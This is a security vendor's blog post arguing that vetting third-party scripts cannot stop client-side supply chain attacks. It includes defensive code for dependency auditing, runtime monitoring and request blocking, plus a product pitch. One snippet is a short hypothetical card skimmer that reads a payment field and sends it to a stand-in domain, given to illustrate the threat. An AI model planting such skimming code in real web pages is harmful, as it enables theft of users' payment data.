Why Script Vetting Isn't Enough to Prevent Client-Side Attacks
May 27th, 2021 | By Jscrambler | 4 min read
In the wake of several recent supply chain attacks, such as the SolarWinds breach and the one that led to the Celsius Network phishing attack, many are advocating for stricter third-party control. Celsius even stated that the company "will raise the bar on what we require from third parties in terms of ISO and SOC certifications."
But what does stricter third-party control really mean? How can companies get a handle on their third parties? And in the context of web supply chain attacks, is script vetting the definitive answer? Let’s find out.
To grasp the concept of third-party vetting, we need to take a look at the average website. Nowadays, with the growing demand for faster product development, developers increasingly rely on externally sourced code, especially JavaScript frameworks and libraries. As a result, the average web app has more than 1000 modules, also known as code dependencies. And because each of these modules can have dependencies of its own, each application ends up shipping thousands of pieces of third-party code.
Then there’s the matter of all the additional scripts that most websites load at runtime. Nearly every website today uses externally sourced services such as chatbots, analytics, or ads.
With such heavy reliance on third parties, the attack surface grows, especially when it comes to supply chain attacks. Because these attacks exploit the lack of visibility companies have over the code dependencies in their supply chain, they can often go unnoticed for weeks. We saw this happen in the Magecart web skimming attack on British Airways in 2018, which went undetected for over two weeks.
Now, the concept behind third-party script vetting is that companies vet each third-party script, as well as the company that provides it, to make sure both are legitimate and secure. Scripts that pass the vetting process are allowed to run; those that fail it are dropped (at least while they remain insecure).
Vetting the script provider is typically done by looking for certifications (ISO/SOC) that attest to the company’s commitment to security. Vetting the script itself, on the other hand, usually involves scanning the code for vulnerabilities or security weaknesses that could make it easier for attackers to compromise it.
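As an illustration, the vulnerability-scanning part of this process can be automated in a build pipeline. The following is a minimal sketch, assuming a Node.js project and the standard JSON output of `npm audit`; it fails the build when any dependency carries a high or critical advisory. It covers only the scanning step, not the full vetting process.

```javascript
// check-deps.js - minimal vetting sketch: fail the build if `npm audit`
// reports high or critical advisories. Assumes a Node.js project with a lockfile.
const { execSync } = require("child_process");

let report;
try {
  // `npm audit --json` exits with a non-zero code when vulnerabilities are
  // found, so the JSON output may arrive via the thrown error's stdout.
  report = JSON.parse(execSync("npm audit --json").toString());
} catch (err) {
  report = JSON.parse(err.stdout.toString());
}

// Severity counts live under metadata.vulnerabilities in the audit report.
const { high = 0, critical = 0 } = report.metadata.vulnerabilities;

if (high + critical > 0) {
  console.error(`Vetting failed: ${high} high and ${critical} critical advisories.`);
  process.exit(1);
}

console.log("No high or critical advisories found.");
```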
At first glance, this may seem like a definitive answer to the problem. However, as we will see next, while this method of third-party vetting plays an important role in helping companies address web supply chain attacks, it must be coupled with additional security measures.
If we were to closely observe the different pieces of any given website over the course of a few days, we would see hundreds of code dependencies constantly changing. Each of these frameworks and libraries receives updates, as do their respective fourth parties (their own dependencies).
When we contrast this dynamic scenario with the concept of script vetting, we quickly see why script vetting alone is not enough to guarantee the security of third-party scripts. The biggest problem with script vetting is that it only provides a snapshot of a single moment in time. A script that was successfully vetted and deemed secure today (because it comes from a legitimate company and doesn’t contain any known vulnerabilities) can suddenly become a security liability. If we trusted vetting alone, we would be blindly trusting this script, with no regard for what it is actually doing on our website. The Copay incident is a perfect illustration: a seemingly legitimate library (the event-stream npm package) was covertly taken over by an attacker, who published an update containing malicious code; that code eventually made its way into production releases of the Copay crypto wallet and stole some of its users’ funds.
Another key issue with this approach is that the average website contains 35 different third-party components. Since the web supply chain is only as secure as its weakest link, a robust vetting strategy would entail going through every single one of these scripts, which is an extremely complex task.
Finally, the script vetting process itself is not without flaws. While scanning for known vulnerabilities is a good security practice, it does not analyze what every single line of code actually does in search of potentially malicious behavior. A script with no known vulnerabilities can still be dangerous, for instance if it quietly accesses sensitive user data.
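To make this concrete, here is a hypothetical example: a few lines of perfectly "clean" JavaScript, with no known CVEs and nothing a vulnerability scanner would flag, that nonetheless skim a payment form. The field ID and the exfiltration domain are made up for illustration.

```javascript
// Hypothetical skimmer: nothing here matches a known vulnerability signature,
// yet the behavior is clearly malicious. The ID and domain are illustrative only.
document.addEventListener("submit", (event) => {
  const cardField = event.target.querySelector("#card-number"); // assumed field ID
  if (cardField) {
    // Quietly exfiltrate the value to an attacker-controlled domain.
    navigator.sendBeacon(
      "https://stats-collector.example.com/c", // made-up domain
      JSON.stringify({ card: cardField.value })
    );
  }
});
```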
So, if script vetting alone is not the definitive answer to web supply chain security, what is?
The short answer to this question is security-in-depth.
As we have seen, script vetting doesn’t account for the fact that a legitimate script can suddenly change its behavior. So the next step in an in-depth approach is gaining real-time visibility into how each individual script behaves on the website. This visibility allows companies to immediately detect suspicious behavior, such as a known script suddenly starting to tamper with a payment form (a Magecart web skimming attack) or attempting to send data to an unknown domain (data leakage).
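There are different ways to implement this kind of visibility. As a rough sketch (not a description of any particular product), the snippet below uses two standard browser APIs: a MutationObserver to notice when a payment form is tampered with, and a wrapper around fetch to flag requests to domains outside an allowlist. The form selector and the allowlisted domains are assumptions made for the example.

```javascript
// Minimal visibility sketch using standard browser APIs.
// Selector and allowlist are assumptions for this example.
const ALLOWED_DOMAINS = ["example.com", "api.example.com"];

// 1. Watch the checkout form for unexpected DOM changes (e.g. injected fields).
const form = document.querySelector("#checkout-form"); // assumed selector
if (form) {
  new MutationObserver((mutations) => {
    console.warn("Payment form was modified at runtime:", mutations);
    // In a real deployment this would be reported to a monitoring backend.
  }).observe(form, { childList: true, subtree: true, attributes: true });
}

// 2. Flag outbound requests to domains that are not on the allowlist.
const originalFetch = window.fetch;
window.fetch = function (resource, options) {
  const target = resource instanceof Request ? resource.url : resource;
  const url = new URL(target, location.href);
  if (!ALLOWED_DOMAINS.includes(url.hostname)) {
    console.warn("Request to unexpected domain:", url.hostname);
  }
  return originalFetch.call(this, resource, options);
};
```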
Considering that Magecart web skimming attacks remain active for 22 days on average before being detected, this real-time visibility can drastically improve incident response and contain data leaks.
Still, visibility is only half of what a security-in-depth approach requires. The other half comes from having complete control over the behavior of each script. Effective control means being able to define which behaviors are allowed or disallowed and enforce those rules in real time, so that any attempt at malicious activity (e.g. leaking user data or displaying a popup on top of the website) is blocked immediately, thwarting the attack.
To achieve this level of control, companies need to look for solutions that make it possible to establish powerful and flexible rules that block malicious activity on the client side. At the same time, these solutions must ensure that the normal functionality of each script is not compromised, so that the user experience remains unaffected.
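To show the difference between observing and enforcing, the sketch below extends the ideas from the visibility example: instead of merely flagging a request to an unknown domain or reporting form tampering, it blocks the request and reverts the injected element, while legitimate traffic and behavior go through untouched. The rule names, selector, and allowlist are made up for illustration; a complete solution would also have to cover XHR, form posts, image beacons, and so on.

```javascript
// Sketch of simple, declarative blocking rules enforced at runtime.
// Rule names, selector, and allowlist are illustrative assumptions.
const rules = {
  allowedNetworkDomains: ["example.com", "api.example.com"],
  allowFormMutation: false,
};

// Enforce the network rule: reject requests to non-allowlisted domains.
const originalFetch = window.fetch;
window.fetch = function (resource, options) {
  const target = resource instanceof Request ? resource.url : resource;
  const url = new URL(target, location.href);
  if (!rules.allowedNetworkDomains.includes(url.hostname)) {
    return Promise.reject(new Error(`Blocked request to ${url.hostname}`));
  }
  return originalFetch.call(this, resource, options);
};

// Enforce the form rule: undo injected elements instead of just reporting them.
const form = document.querySelector("#checkout-form"); // assumed selector
if (form && !rules.allowFormMutation) {
  new MutationObserver((mutations) => {
    for (const mutation of mutations) {
      mutation.addedNodes.forEach((node) => node.remove()); // revert tampering
    }
  }).observe(form, { childList: true, subtree: true });
}
```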
There's no question that there's still a long road ahead before companies can fully control their web supply chain. So here's how to take the first step: request a Free Website Inventory Report and gain full visibility over your website’s scripts and their specific behaviors.
Jscrambler
The leader in client-side Web security. With Jscrambler, JavaScript applications become self-defensive and capable of detecting and blocking client-side attacks like Magecart.